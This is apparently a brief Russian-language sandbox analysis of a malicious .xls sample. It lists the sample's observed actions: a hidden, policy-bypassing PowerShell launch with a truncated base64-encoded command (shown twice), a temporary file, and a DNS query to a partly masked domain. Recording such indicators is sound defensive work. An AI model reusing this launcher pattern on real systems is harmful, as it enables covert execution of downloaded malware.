Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -noni -windowstyle hidden -exec bypass -enc WwBTAHkAUwB0AGUATQAuAE4AZQBUAC4AUwBFAFIAdgBpAEMAZQBQAG8ASQBuAFQATQBhAG4AQQBnAEUAcgBdADoAOgBFAFgAcABlAGMAdAAxADAAMABDAE8ATgB0AEkATgBVAGUAIAA9ACAA...
- <Текущая директория>\a4cd0000
- <PATH_SAMPLE>.xls
- DNS ASK co###xnews.ca
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -noni -windowstyle hidden -exec bypass -enc WwBTAHkAUwB0AGUATQAuAE4AZQBUAC4AUwBFAFIAdgBpAEMAZQBQAG8ASQBuAFQATQBhAG4AQQBnAEUAcgBdADoAOgBFAFgAcABlAGMAdAAxADAAMABDAE8ATgB0AEkATgBVAGUAIAA9ACAA...' (со скрытым окном)